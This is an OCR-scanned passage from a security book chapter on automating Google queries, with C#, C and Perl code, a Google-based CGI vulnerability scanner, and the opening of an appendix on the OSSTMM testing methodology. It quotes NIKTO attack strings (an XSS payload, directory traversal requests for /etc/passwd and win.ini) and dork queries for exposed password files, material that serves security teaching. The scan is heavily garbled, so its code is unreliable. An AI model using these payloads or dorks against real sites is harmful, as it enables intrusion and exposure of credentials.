tmp , buffer != null ? buf fer . Length : 0); buffer = tmp; } } catch { if (buffer == null) throw new Exception ( "No data read from host"); } // find the total hits string text = System. Text .ASCIIEncoding . ASCII . GetString (buf fer ) ; Regex regex = new Regex(@"of about <b> ( ?<count> [ 0-9 ,]+)") ; Match m = regex. Match ( text ) ; if (m. Success == false) throw new Exception (" Parse error"); return m. Groups [" count " ] .Value; } } /// <summary> /// Summary description for Classl. /// </summary> class AppClass 396 Chapter 12 • Automating Google Searches { /// <summarY> /// The main entry point for the application. / / / < / suinmarY> [STAThread] static void Main ( string [ ] args) { GoogleQuery gq = new GoogleQuery ( ) ; gq . Socketlnit ( ) ; gq . SendQuery ( ) ; Console .WriteLine ( "Total Hits {0}", gq.GetTotalHits ( ) ) ; } } } Source Documentation The code for the Google C# appHcation is much different from that of the Perl script because it's object oriented and located in a single object as opposed to functions. Initially, we'll create a new object that will be responsible for the core of our functionality. This new object will allow us to easily reuse our code in other projects or in applications that attempt to wrap or further automate the Google querying process. The name of the object that we have created is GoogleQuery. GoogleQuery has three public methods that we're interested in: SendQuery, GetTotalHits, and its constructor. The first public method, GoogleQuery, has three private constant variables: string query, string server, and in t port. These store the program's required variables for instantiating and establishing the socket connection. GoogleQuery's constructor creates a new TCP socket via the Socket object's constructor. Following the cre- ation of the TCP socket, it looks up the IP address ofgoogle.com by means of the static, built-in C# method Dns.Resolve. Dns.Resolve returns an object of type IPHostEntry. The IP address ofgoogle.com can be extracted from this object by referencing the first index of the AddressList member of IPHostEntry (ipHostInfo.AddressList[0]). Next, the code creates an object of type IPEndPoint and passes two arguments to its constructor: the IP address gleaned from IPHostEntry and the port number to connect to. This IPEndPoint object is then www. syngress.com Automating Google Searches • Chapter 12 397 passed as an argument to the socket object's Connect method. Should all this suc- ceed, the socket is connected to google.com's port 80. If it fails, an exception will be thrown; however, due to the demonstrative nature of this example, error han- dling has been onTitted irom the program. Google Query's Send Query method is rather simple. It merely passes an HTTP GET request string to the established Google socket. One thing to note is that Socket. Send expects a byte array rather than an ASCII string. For that reason, we need to convert the ASCII string to a byte array using the ASCIIEncoding. ASCII. GetBytes static method. The last method of interest, or Method 3, is GetTotalHits.The first 19 lines of code wait until all data is received from the socket and concatenate it into one buffer. This code uses the method Socket. Receive, which fiUs a byte array. The last segment of interesting code is the utilization of.NET regular expressions. First, we instantiate a Regex object and pass it one parameter — the pattern to search for. The pattern string consists of the literal phrase "of about" followed by a named group count, for which the pattern consists of a number. By naming the components of a regular expression, it becomes easier to reference them after the pattern has been matched {m. Groups ["count"]. Value). Next, the Regex object is passed the buffer returned fi^om Google via the Match method. After that, if the pattern matches, a string is returned that contains the number of hits found from the query. Underground Googling... Where Credit Is Due A special thank you goes out to Blake Watts (www.blakewatts.com) for his assistance with the C# code and knowledge. You continue to rock. Thanks, dude! C Implementation The following C implementation was provided by our fi^iend lOom to be utilized as an educational tool in this book. As you will quickly come to see, the C implementation is somewhat different from the other language implementations described in this chapter. Not only is this implementation longer, it includes www.syngress.com 398 Chapter 12 • Automating Google Searches additional functionality that the other language kits have left out. Additional functionality includes command line help documentation and the ability to receive command-line arguments and return a list of sites included within the response. Only the complete source and corresponding documentation have been incorporated into this section. SOURCE //Google Hacking in Good Old-Fashioned C //Written by lOom //Revised and Documented by Foster /* Igool V 0.2 written by lOom WWW.EXCLUDED.ORG - lOom [a7 ] excluded [d07 ] org idea based on johnny longs gooscan and goole dorking itself, thanks john. this is a part of a proof -of -concept project in automate attacks with googles help. greets to goolemasters : murfie , klouw, ThePsyko , j immyneutron, MILKMAN, Deadlink, crash_monkey , zoro2 5 cybercide, wasabi greets to geeks/ freaks /nice_people like: proxy, detach, takt, dna, maximilan, capt.boris, dr.dohmen. / / I I-/ 1 / I-/ I ./ WWW. syngress.com Automating Google Searches • Chapter 12 399 mattball */ #Section 1 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys / types .h> # include <sys/ time . h> #include <netinet/in.]i> #include <netdb.h> ttSection 2 #define GOOGLE "www.google.com" //default google server to send query ttdefine PATTERN "<p class=g><a href=" / / indentifies links in googles results ttdefine RESULTS "<font size=-l color=#000000> " //show results char *encode(char *str) ; // NULL on failure / the encoded query on success int connect_me (char *dest, int port); // -1 on failure / connected socket on success int grep_google ( char *host, int port, int proxy, char *query, int mode, int start) ; void help (char *usage) ; void header (void) ; #Section 3 int main (int argc, char **argv) { int i, port, valswap, max = 0, only_results = 0, site = 0, proxl = 0 ; // greets at proxy - this variable is dedicated to you ; D h4h4h4 char *host, *query = NULL; if (argc == 1 ) { help (argv [ 0 ] ) ; return ( 1 ) ; www.syngress.com 400 Chapter 12 • Automating Google Searches } else for(i = 1; 1 < argc i + +) if (argv[i] [0] == '-■ ) switch (argv [i ][ 1 ] ) { case 'V : header ( ) ; return ( 0 ) ; case ' r ' : onlY_results = 1 ; break; case 'm' : max = atoi (argv [++i ] ) ; break; case ' p ' : if( (host = strchr (argv[++i] , ':')) == NULL) { return ( 1 ) ; } port = atoi (strtok (host, ":")); host = strtok (argv [ i ] , ":"); proxl = 1; // "gib frei ich will rein" break; case ' h ' : help (argv [ 0 ] ) ; return ( 0 ) ; } else query = argv[i]; if (query == NULL) { fprintf (stderr, "no query! \n"); help (argv[0] ) ; return ( 1 ) ; } if( (query = encode (query ) ) == NULL) { fprintf ( stderr , "string encoding faild!\n"); return (2 ) ; fprintf (stderr , "illegal proxy syntax [host : port] \n" ) ; WWW. syngress.com Automating Google Searches • Chapter 12 401 } if(!max) { if (grep_google (host , port, proxl , query, onlY_results , site) > 0) return ( 0 ) ; for(i =0; i < max; ) if( (valswap = grep_google (host , port, proxl, query, only_results , site)) <= 0) return(l); else if (valswap < 10) return(O); else { i+=valswap; site+=10; } return ( 0 ) ; } ttSection 4 int grep_google ( char *host, int port, int proxl, char *query, int mode, int site) { unsigned int results = 0 ; int sockfd, nbytes, stdlen = 31, prxlen = 38+strlen (GOOGLE) , buflen = 100; char *sendthis, *readbuf, *buffer, *ptr; if (proxl) { return ( -2 ) ; if( (sendthis = (char * ) malloc (prxlen+strlen (query ) +7 ) ) == NULL) { perror ( "malloc " ) ; return ( -1 ) ; } else sprintf ( sendthis , "GET http : / /%s/search?q=%s&start=%d else return ( 1 ) ; } if( (sockfd = connect_me (host , port)) == -1) // connect to proxy HTTP/1 . 0\n\n" , GOOGLE , query , site) ; } else { if( (sockfd = connect_me (GOOGLE, 80)) == -1) return ( -2 ) ; 402 Chapter 12 • Automating Google Searches if( (sendthis = (char * ) malloc ( stdlen+strlen (query) +7 ) ) == NULL) { perror ( "malloc " ) ; return ( -1 ) ; } else sprintf ( sendthis , "GET /search?q=%s&start=%d HTTP/1 . 0\n\n" , query, site) ; } if( (readbuf = (char *) malloc (255 ) ) == NULL) { perror ( "malloc " ) ; return ( -1 ) ; } if( (buffer = (char *)malloc(l)) == NULL) { perror ( "malloc " ) ; return ( -1 ) ; } if (send ( sockf d, sendthis, strlen (sendthis ), 0 ) <= 0) return ( -2 ) ; while ( (nbytes = read(sockfd, readbuf, 255)) > 0) { if( (buffer = (char * ) realloc (buf f er , buflen+=nbytes ) ) == NULL) { perror ( " realloc " ) ; return ( -1 ) ; } else { strcat (buf f er , readbuf); memset (readbuf , 0x00, 255); } } close ( sockf d) ; ptr=buf f er ; while (buflen-- ) if (mode) { if (memcmp (ptr++, RESULTS, strlen (RESULTS) ) == 0) { ptr += strlen(RESULTS) -1; while (memcmp (ptr, "for", 3) != 0) { if (memcmp (ptr , "<b>", 3) ==0) ptr+=3 ; else if (memcmp (ptr , "</b>", 4) == 0) ptr+=4; else printf ( " %c " , *ptr++ ) ; WWW. syngress.com Automating Google Searches • Chapter 12 403 } } else continue; printf ( " \n" ) ; return ( 0 ) ; } else if (memcmp (ptr++ , PATTERN, strlen ( PATTERN) ) == 0) { ptr += strlen(PATTERN) -l; results++ ; while (memcmp (ptr, ">", 1) && buflen--) printf (" %c ", *ptr++ ) printf ( " \n" ) ; } free (sendthis) ; free ( readbuf ) ; return (results ) ; #Section 5 char *encode(char *str) { static char *querY; char *ptr; int nlen, i ; nlen = strlen (str) *3 ; if( (query = (char * ) malloc (nlen) ) perror ( "malice " ) ; return (NULL) ; } else ptr = str; NULL ) { for(i =0; i < nlen; i+=3) sprintf (&query [ i ] , " %c%X" , ' % ' , *ptr+ + ) querY[nlen] = '\0'; return (query) ; www.syngress.com 404 Chapter 12 • Automating Google Searches #Section 6 int connect_me (char *dest, int port) { int sockfd; struct sockaddr_in servaddr; struct hostent *he; if( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ( " socket " ) ; return ( -1 ) ; } if( (he = gethostbyname (dest ) ) == NULL) { fprintf (stderr, "cannot resovle hostname\n" ) ; return ( -1 ) ; } servaddr . sin_addr = *( (struct in_addr *) he->h_addr) ; servaddr . sin_port = htons (port ) ; servaddr . sin_familY = AF_INET; if (connect (sockfd, (struct sockaddr *)&servaddr, sizeof ( struct sockaddr) ) == -1) { perror ( " connect " ) ; return ( -1 ) ; } else return ( sockfd) ; } #Section 7 void help (char *usage) { printf("%s help\n" , usage) ; printf("%s <query> [options] \n" ) ; puts ( "options : " ) ; puts("-h: this help menu"); puts("-p: request google with a proxy, next argument must be the proxy" ) ; WWW. syngress.com Automating Google Searches • Chapter 12 puts ( " and the port in the following format \ "host :port\ " " ) ; puts("-m: next argument must be the count of results you want to see" ) ; puts("-V: prints versions info"); puts("-r: prints only the results count and exit"); puts ( " examples : " ) ; printf("%s \ "fi-letype :pwd inurl : service . pwd\ " -r # show resultsXn"); printf("%s \ "filetype :pwd inurl : service . pwd\ " -m 30 # print about 30 resultsXn" ) ; } ttSection 8 void header (void) { puts ( " \tlgool V 0.2"); puts ( "written by lOom - WWW.EXCLUDED.ORG - 10om[47]excluded[d07]org\n" ) ; } Source Documentation The first section of this program (yes, it's a program, not script) sets the required libraries that must be included to complete successful compilation. The second section includes the global variables needed in the program and the prototypes. Section 3 is the MainQ function of the program, whereas the fourth section is dedicated to "grepping the Google site." Section 4 contains the meat of the pro- gram because the searching and proxying logic is included within that function. Section 5 is somewhat than our scripting querying libraries or even the C# implementation. It's utilized to convert the desired search string in the program to a HTTP-compliant Google query string. Notice the conversion housed within the For loop. Once the string is properly formatted, the string is returned. The sixth section is one of our favorites because it's similar to the socket ini- tialization functions within the other Google attack libraries. All the code to establish and connect to Google is contained in connect_me(). The socket structure and connection attempts are encapsulated in IF statements. Another alternative to utilizing IF statements is try catch blocks. The seventh section of the program prints the Help menu. Last but not least. Section 8 is a header that prints every time the program is executed. 406 Chapter 12 • Automating Google Searches Scanning the Web with Google Attack Libraries We've covered the concept of automating Google query transmissions and retrieving data, but we have yet to prove that our libraries work in a real-world environment. The libraries were all created with dynamic usage in mind, thereby permitting our querying bots to reuse the Google query and scraping code with minimized inline modifications. The following tool leverages the attack signatures found in the NIKTO security database, which can be found at www.cirt.net. CGI Vulnerability Scanning The following is a CGI scanner that we have created by quickly extending the Perl implementation code. Before we display and document our source, a snippet of the NIKTO database has been included. The NIKTO database is a flat text file for which the fields are separated by commas (,). In this scenario, we are only concerned with the HTTP string that is meant to be sent to the target Web servers. It is critical to note that the NIKTO text-based database is completely broken from a consistency perspective. That said, every "attack" is listed in the second column of the file, and by no coincidence that is the field that we are ripping with our Google CGI Vulnerability Scanning tool. NIKTO Vulnerability Database Snippet #VERSION, 1 . 189 #LASTMOD, 09.06.2004 # http://www.cirt.net ######################################################################## # Checks: ws type , root , method, file , result , information , data to send ######################################################################## # <script>alert ( 'Vulnerable ' ) </script>" , " <script>alert ( 'Vulnerable ' ) </script>" , "GET" # is vulnerable to Cross Site Scripting (XSS). CA-2000-02." ## These are normal tests "generic" , " /index. php?module=ew_filemanager&tYpe=admin&func=manager&pathext= . ./../.. /etc" , "passwd" , "GET" , "EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193 . " WWW. syngress.com Automating Google Searches • Chapter 12 407 "generic " , " /index. php?inodule=ew_filemanager&tYpe=admin&func=manager&pathext= . ./../.. /etc/&view=passwd" ," root :", "GET" , "EW FileManager for PostNuke allows arbitrary file retrieval. OSVDB-8193 . " "generic "," /logs/str_err . log" ," 200 ", "GET" , "Bmedia error log, contains invalid login attempts which include the invalid usernames and passwords entered (could just be typos & be very close to the right entries) . " "abyss " , " /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin . ini " , " [ fonts ] " , "GET", "Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version." "abyss " , " /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin . ini " , " [windows ] ", "GET" , "Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version." " abyss 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1" ,"^rY&&yi of "GET" , "Abyss 1.03 reveals directory listing when 255 /'s are requested." "abyss "," /conspass . chl+ "," 2 00 "GET" , "Abyss allows hidden/protected files to be served if a + is added to the request." "abyss "," /consport . chl+ "," 2 00 ", "GET" , "Abyss allows hidden/protected files to be served if a + is added to the request." "abyss "," /general . chl+ "," 2 00 ", "GET" , "Abyss allows hidden/protected files to be served if a + is added to the request." "abyss "," /srvstatus . chl+ "," 200 ", "GET" , "Abyss allows hidden/protected files to be served if a + is added to the request." "alchemyeye" , "@CGIDIRS ../../../../../../../../../.. /WINNT/system32 /ipconfig . e xe","IP Configuration" , "GET" , "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "alchemyeye" , " @CGIDIRSNUL/ ../../../../../../../../.. /WINNT/system32 / ipconfig . exe","IP Configuration" , "GET" , "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "alchemyeye" , " SCGIDIRSPRN/ ../../../../../../../../.. /WINNT/system32 /ipconfig . exe","IP Configuration" , "GET" , "Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands." "apache" ,"/ .DS_Store" , "Budl" , "GET" , "Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version." "apache" ,"/. FBCIndex" , "Bud2 ", "GET" , "This file son OSX contains the source of the files in the directory. http : / /www. securiteam . com/securitynews/5LP0O005FS . html " "apache" ,"//"," index of ", "GET" , "Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page." www.syngress.com 408 Chapter 12 • Automating Google Searches "apache" ,"//", "not found f or :"," OPTIONS ", "By sending an OPTIONS request for /, the physical path to PHP can be revealed." The following is our developed source code to scan a particular site using the signatures housed within CIRT's NIKTO database. SOURCE # ! /usr/bin/perl -w use 10 : : Socket ; $server = 'www.google.com'; $port = 80; ############################# sub socketlnitO { $socket = 10 :: Socket :: INET->new( Proto => ' top ' , PeerAddr => $ server, PeerPort => Sport, Timeout => 10, ) ; unless ($socket) { die ("Could not connect to $server : $port " ) ; } $sooket->autofLush ( 1 ) ; } ############################ sub sendQuery($) { my ($myquery) = ©_; print $socket ("GET $myquery HTTP/1 . 0\n\n" ) ; while ($line = <$socket>) { if ($line =~ /Results . *of\sabout/ ) WWW. syngress.com Automating Google Searches • Chapter 12 409 return $line; } ############################ sub getTotalHits ($) { my ($ourline) = @_; $hits=" " ; $index = index ( $ourline, "of about"); if ($index > -1) { $str = substr ( $ourline, $index, 30); @buf =split (// , $str) ; for ($i = 0; $i < 30; $i++) { if ($buf[$i] =~ /[0-9]/) { $hits=$hits . $buf [$i] ; } } return $hits; } else { return $ index; } } ############################ socketlnit ( ) ; #### #Code added to make this a CGI scanner $targetsite = " /search?sourceid=navclient&ie=UTF-8&q=site : syngress . com+ " www.syngress.com 410 Chapter 12 • Automating Google Searches $cgifile = "nikto.txt"; $allinurl = "allinurl : " ; open (CGI, $cgifile) I I warn "could not open the CGI query file"; while (<CGI>) { chop ; #stripping comments next if (/'^$/); #ignore null lines next if (/•^\s*#/); # ignore comment lines next if (/'^\%/); #ignore documentation lines #spliting up the NIKTO database and storing elements ($tYpe, $attack, $file, $method, $name) = split (/","/) ; $attack =~ s/'~\s+//; #remove leading whitespaces $attack =~ s/\s+$//; #remove trailing whitespaces $attack = $targetsite . $allinurl . $attack; #In case you would like to see all the queries you are sending to Google #print "Trying Google Query: ", $attack, "\n"; $string = sendQuery ( $attack) ; $totalhits = getTotalHits ( $string) ; tPrinting to STDOUT the Total Hits Retrieved from Google is Greater than 0 if ($index > 0) { print "VULNERABILITY FOUND WITH ", $totalhits ," TOTAL HITS\n"; } } close CGI; WWW. syngress.com Automating Google Searches • Chapter 12 411 Output First you will notice warnings when you run this script. These appear because we are splitting the NIKTO database into separate variables and utilizing the second variable, $attack. No need to be concerned; as these warnings are meant to be included. The script wiU run aU the NIKTO vulnerability checks within a set of Google queries and output when a vulnerability is found in Google's cache. No output wiU be displayed outside the warning if vulnerabilities are not found. www. syngress.com Chapter 12 • Automating Google Searches Summary In any implementation, automating information-gathering techniques has become a necessary evil. It's not feasible that we would ever have the time required to manually coUect, store, parse, and analyze data from sources as large as Google. Throughout this chapter, we have provided an overview of the Google Development API with its benefits and downfalls. We have also given you the code and knowledge to be able to directly access the Google Web application database with our Google attack libraries that contain query transmission and page-scraping functions. These Hbraries can be quickly extended to create addi- tional tools, appHcations, or even Web-based CGI forms. Although beneficial, it is important to note that these libraries do not adhere to the Google terms of ser- vice and were meant to be for educational purposes only. Solutions Fast Track Understanding Google Search Criteria 0 In a relatively short amount of time, Google has become synonymous with Internet searching. Learning to search Google's online database with its advanced flags is the key to successful Web surfing. 0 Advanced searching permits users — and more specifically, automated programs — to filter and Hmit the results to a much narrower set of Web pages. 0 A Google Advanced Search Page documents most of the detailed searching capabilities of Google's database to include country, language, and image searching. Understanding the Google API 0 The Google API is designed for application developers looking to automate the collection of Google information in a sanctioned manner. 0 A complete manual on the Google development API can be found at www.google.com/ apis/. 0 The Google API requires a Google API key that liimts an automated engine to sending fewer than 1000 queries per day. www. syngress.com Automating Google Searches • Chapter 12 Understanding Google Attack Libraries 0 Google attack libraries are broken into three main components: socket initialization and establishment, Google query requesting, and retrieving a Google query response. 0 The Python language proved the most useful and efficient for creating Automated Google Query code. Its OOP style, easily accessible regular expression engine, and indexing methods made it easy to create, send, retrieve, and scrape Google information. 0 The C# for Microsoft .NET library is the most extendable language implementation of our Google libraries because it can be merged into any program that's compatible with Microsoft's Visual Studio .NET. Scanning the Web with Google Attack Libraries 0 Conducting Google vulnerabiHty scans is one of the easiest tasks that's hit the information security industry in the past fev^^ years. The key to automating such a task is the looping constructs that wrap around the Hbrary implementations presented in this chapter. 0 You can implement looping constructs to automate searching and information retrieval for numerous purposes. 0 Nearly all vulnerability scans utilize the allinurl: advanced searching flag to search for strings stored within the Google cache. Links to Sites ■ ApplicationDefense.com An excellent source of information on application hacking and defense mechanisms. This site also contains the Google Attack Libraries discussed in this chapter. ■ Foundstone.com Home of the Google SiteDigger. ■ www.sensepost.com Home of the Wikto tool. ■ www.cirt.net Home of SuUo and the NIKTO Web VulnerabiHty database and NIKTO Web Scanning Tools. ■ www.blakewatts.com Chapter 12 • Automating Google Searches Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql Can you automate Google analysis in languages that do not contain socket- class functionality? Al No. Unfortunately, the initial part of any Google-based data analysis is retrieving such data. The socket, or network, functionality is required to con- nect to Google's databases to send queries and receive responses. That said, it should be understood that an external program could pass Google data to another program for analysis. Q: Does the Google API interfere with our page-scraping mechanisms? Al No. The Google API was created to assist developers looking to access infor- mation ascertained from Google's search engine. Though Google does not condone automatiqJtutside tj^ S|| of the API, page scraping is completely acceptable, as long as the page^S^Mrieved mifl^^Drowser. Scraping and API-based techniques can c»tainly ^^xist^ependirm on the requirements of your project. I ■ Q: What language is best to use for Google pag^6j;gging? A: It completely depends on the nature of the program ^jyji're creating. If you are looking to create an appHcation that sends numerous Google queries and conduct some sort of algorithmic computation on the back end, you'd ben- efit from a faster language such as C/C++ or C# — C# being our new favorite. However, if you're looking for a quick alternative that integrates in Web scripts, Perl is the obvious choice for ease of development and time to integration. Java is the de facto cross-platform language of choice, but some- thing prevents us from saying that VBA is a good choice for anything. www. syngress.com Automating Google Searches • Chapter 12 Q: Do any of the available freeware tools currently use these Hbraries? Al Not in their entirety. However, some of the Perl code has been utiHzed to update GooScan. AH the code provided in this book, on AppHcationDefense, and at Ihackstuff is freely available to use and distribute as long as proper attribution is provided. Ql Is HTTP 1.0 versus HTTPl.l a major decision when considering what pro- tocol to use to transmit the queries? Al Yes. HTTP 1.1 is much more efficient for transmitting multiple sequences of packets to a Web server. In this case, the libraries are not taking advantage of the HTTP 1 . 1 protocol, thereby making the decision trivial. Q: Can any of this code be leveraged to proxy anonymous attacks through Google? A: Outside of the socket code, nothing could be utilized to proxy attacks. A paper was released in 2001 on making Web attacks anonymous through open Web proxies. We encourage you to search for the paper via Google if you're seeking to gain experience. www. syngress.com Appendix Professional Security Testing by Pete Herzog Solutions in this Chapter: ■ Professional Security Testing ^ The Open Source Security Testing Methodology IV|gjauLiA5iSJMM) '0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 418 Appendix A • Professional Security Testing Introduction Sometimes you win. Sometimes you lose. Sometimes it's all about the game. Security testing is all about the game. Without trying to borrow too much from sports, it's really about being in the zone. It's when the data reveals itself to you smoother than silk on silk — all systems roU out in fi^ont of you like that all- inviting red carpet and while you stroll down the line, doors pop open every- where you look. As you glide into the final stretch, you look back and all the weaknesses of the entire security presence are lit before you, perfectly structured in a pattern like the lights of an office tower after dark. Sometimes though, it's like being stuck in a Dr. Seuss book with all sorts of bizarre characters, roads that fold back on themselves, and doors floating in the sky that go underground. The path becomes a labyrinth, and your way is easily lost as all your tools begin to fail. You follow the westward descent of the sun only to find that upon turning around, all that was visible is now blocked by your own shadow. It's all about the game. Hide and go seek is one of those games we play because it's fun with its elements of surprise and stealth. As you get older, the game becomes a balance of speed and escape for most players and much less about actually hiding. Can I hide well enough that someone else will get caught before I am found? Who else has seen me use this hiding space so it's no longer good when it's that kid's turn? Can I hide close enough to the base that I can get safe before I get tagged? Can I position myself in a lesser hiding place but where I have more than one escape route? Of course, little of that is consciously decided. The kid picks the position that most reflects his or her ability compared to the person who is seeking. Those who choose wrong are caught. Those who choose right go free. Then everyone re-evaluates possible hiding places after each round. Meanwhile, the seeker has to analyze all the possible strategy changes simultaneously. Each time a kid seeks, he or she realizes that experience for that game counts very little. Each hider will most likely take new strategies and the ones who don't, won't, because they cannot be caught anyway. The game continues. Security testing is that game where the tester is the seeker. Each round brings more data, even if the data is false or empty from no response. The tester must make a decision each round whether to keep going with that direction or pick a new strategy. Each hider that can be caught must be caught. Those who have excellent strategies are noted in case later we realize that the elapsing of time has www. syngress.com Professional Security Testing • Appendix A 419 eroded that particular strategy. The strategies are based on the operating systems, the network architecture, the available services, the business processes, and even the people. The game is played out until everyone is caught or until time runs out. Just like in real-life hide and go seek, there is no quitting while you are still the seeker. But unlike the real hide and go seek, being a bad seeker can have drastic consequences. If a security tester does a poor job, it could mean the client loses money and the tester has the Uability. It can also mean — as in the case of security testing high-frequency microcontrollers in motor vehicles — that people die and the tester is then held liable. So it's no wonder that security testers have a love for search engines like Google. To us, the security testers, Google can be the source of facts that have spilled onto its ever-growing cache in the moment it takes us to blink. Facts do not require that the information be true, only that the fact is there and that it came from a particular place at a particular time. Google is also comprised of knowledge, experience, and the stupid mistakes of thousands of other security professionals that we can compare our own work to. It's an up-to-the-nTinute reference library that doesn't exist yet in any other form. Unlike a mailing list or forum, it answers our questions because of how and when we ask them. It doesn't judge us as to why we asked them. Therefore, our fragile egos won't be bruised or shattered. Professional Security Testing It is true that hacking, in the security sense, is an art. The current services in pen- etration testing and ethical hacking require skills of intuition and creativity. Most often, the decisions made and avenues followed in hacking are instinctual and follow a simple methodology that provides great fr^eedom. Like any art form, whether a thing of beauty or a message, the creation is a combination of the hacker and the effort. But this is not professional security testing. Performing security testing in a professional manner is to be a researcher and a detective. While there may be some art to it, the amount of intuition or expe- rience you have is indirectly proportional to the valid results you achieve. While a great hacker may also be a great security tester, the primary skill set of the security tester is the same of any researcher, knowledge and persistence. Valid results, which must be verified and understood, are the holy grail of a security test. Hacking, just as in any art, is about the final creation. In the end, it doesn't matter what you did to create that art, just that you did it and it's impressive. www. syngress.com 420 Appendix A • Professional Security Testing Security testing is about being sure of everything you did to reach the end result and understanding why you did it. You need to understand the conclusions you have reached and find as much evidence as necessary to support those conclu- sions. The final results may or may not be impressive, but either way they don't require an artist to create them. They require a methodology. The Open Methodology In December of 2001, a Google search for either a security testing methodology, a penetration testing methodology, or an ethical hacking methodology all brought back the same phrase. Regardless of the Web site, the phrase looked something like this: "...The best possible test using our in-house, proprietary method- ology for security testing..." This phrase, while deceptively boilerplate, indicated a devastating flaw in the art of the security test. In-house proprietary methodology loosely translates to "we did it our way, and we can't tell you what that way is; it's proprietary." For this reason, the Open Source Security Testing Methodology Manual (OSSTMM) concept took off. Hundreds of people contributed to the project, injecting both criticism and encouragement. Every piece of feedback made it better. Eventually, as the only publicly available methodology that tested security from the bottom up (as opposed to the policy down), it received the attention of government agencies and militaries around the world. It also scored success with Uttle security start-ups who wanted a public source for client assurance of their security testing services. Now, the OSSTMM seal, as seen in Figure A.l, is the standard for secu- rity testing reports, accepted internationally by most all government auditing organizations. www. syngress.com Professional Security Testing • Appendix A 421 Figure A.I The Generic OSSTMM Seal The OSSTMM had been housed under the domain ideahamster.org, where it received a steady amount of traffic fi-om contributors dubbed as ideahamsters, a nickname for people who were currently churning out new ideas like a hamster on a wheel. However, as the OSSTMM grew in popularity, the organization and its name were pressured to grow up as well. In November of 2002, ideahamster announced the name change to ISECOM, which actually stood for the Institute for Security and Open Methodologies. By January 2003, ISECOM had been registered as a non-profit organization in Spain and the United States. Now it oiiicially belonged to the people. And the users of the OSSTMM had a responsi- bility to give back to it or else it would cease to exist. As the OSSTMM continues to grow, it has never lost its vendor-free, industry-agnostic, politically clean values. The methodology has continued to provide straight, factual tests for factual answers. It includes information for pro- ject planning, quantifying results, and the rules of engagement for those who will perform the security tests. As an academic document, it's a flop. It is fuU of gram- matical errors, the English language shifts between British and American spelling styles, and the format is unacceptable for most every university graduate pro- gram. However, the goal of the document is not academic. It is simply there to be used. The OSSTMM has no intentions of being a textbook. As a method- ology, you cannot learn from it how or why something should be tested. What www. syngress.com 422 Appendix A • Professional Security Testing you can do is incorporate it into your testing needs, harmonize it with existing laws and policies, and use it as the framework it is to assure a thorough security test through all channels to information or physical property, as seen in Figure A.2, a map of the security presence. Figure A.2 Map of the Security Presence with All Channels for Access to Information and Physical Property The security presence is the area for which security can influence your property regardless of your ability to influence or practice security therein. For example, consider protecting your ice cream shop from theft. There are many ways an attacker can cut the electricity going to your store. While that isn't stealing your merchandise, it adversely affects your product line (your ice cream melts) and therefore reduces your income. Is the electrical grid within your security pres- ence? Yes. Can you directly control it? No. You have to rely on service-level agreements irom the power company and buy your own generator to handle brownouts and blackouts. Electricity is considered part of physical security, which is just one channel of five that make up your security presence. It gets even more Professional Security Testing • Appendix A 423 complicated as technology promotes channels to cross. The five channels are described in Table A. 1 . Table A.I The Security Presence Channel Descriptions Channel Description Personnel Comprises the human element of interaction where people are the gatekeepers of information and phys- ical property. Physical Comprises the non-human tangible element of secu- rity where interaction requires a physical effort to manipulate it. Telecommunications Comprises telecommunication networks, digital or analog, where interaction takes place over estab- lished network lines without human assistance. Wireless Comprises all non-human interaction that takes Communications place over the known communication spectrum, from the lowest frequencies to the highest. Data Networks Comprises all data networks where interaction takes place over established network lines without human assistance. Understanding the extent of a security presence and the concept of security channels requires a certain amount of research. Often times, the depth of this research is dictated by the amount of time allocated, which reflects on cost or price. Even the smallest amount of time wasted, whether through inefficiency or inability, can have drastic consequences like in the case of securing a Red Cross barracks on battle-heavy soil, where wasted time means people die. While today's standard penetration tester doesn't have that worry, don't doubt that the future needs for security testing don't have that vision. This aU points to the need for a standardized methodology for security testing. The Standardized Methodology In the plainest terms, a methodology is a structure. Think recipes from a cook- book. The methodology is the difference between a cake and just a big mess of ingredients. While there are many different types of security methodologies, there is only one that's universally accepted for security testing and the quantification of metrics. www. syngress.com 424 Appendix A • Professional Security Testing The OSSTMM is a standardized methodology for a thorough verification and measurement of the current operational, security state. That's actually a lot of academic-type talk for saying that the OSSTMM will aide you in performing a security test according to a recipe that allows you to not only run the best pos- sible test you can generate in the most efficient way (saving time saves money), but that also gives you numbers that realistically represent your current level of security. Actually, the OSSTMM will define and quantify three types of security within the chosen scope. This is an important concept because the scope may not be the same as the security presence. You can think of the 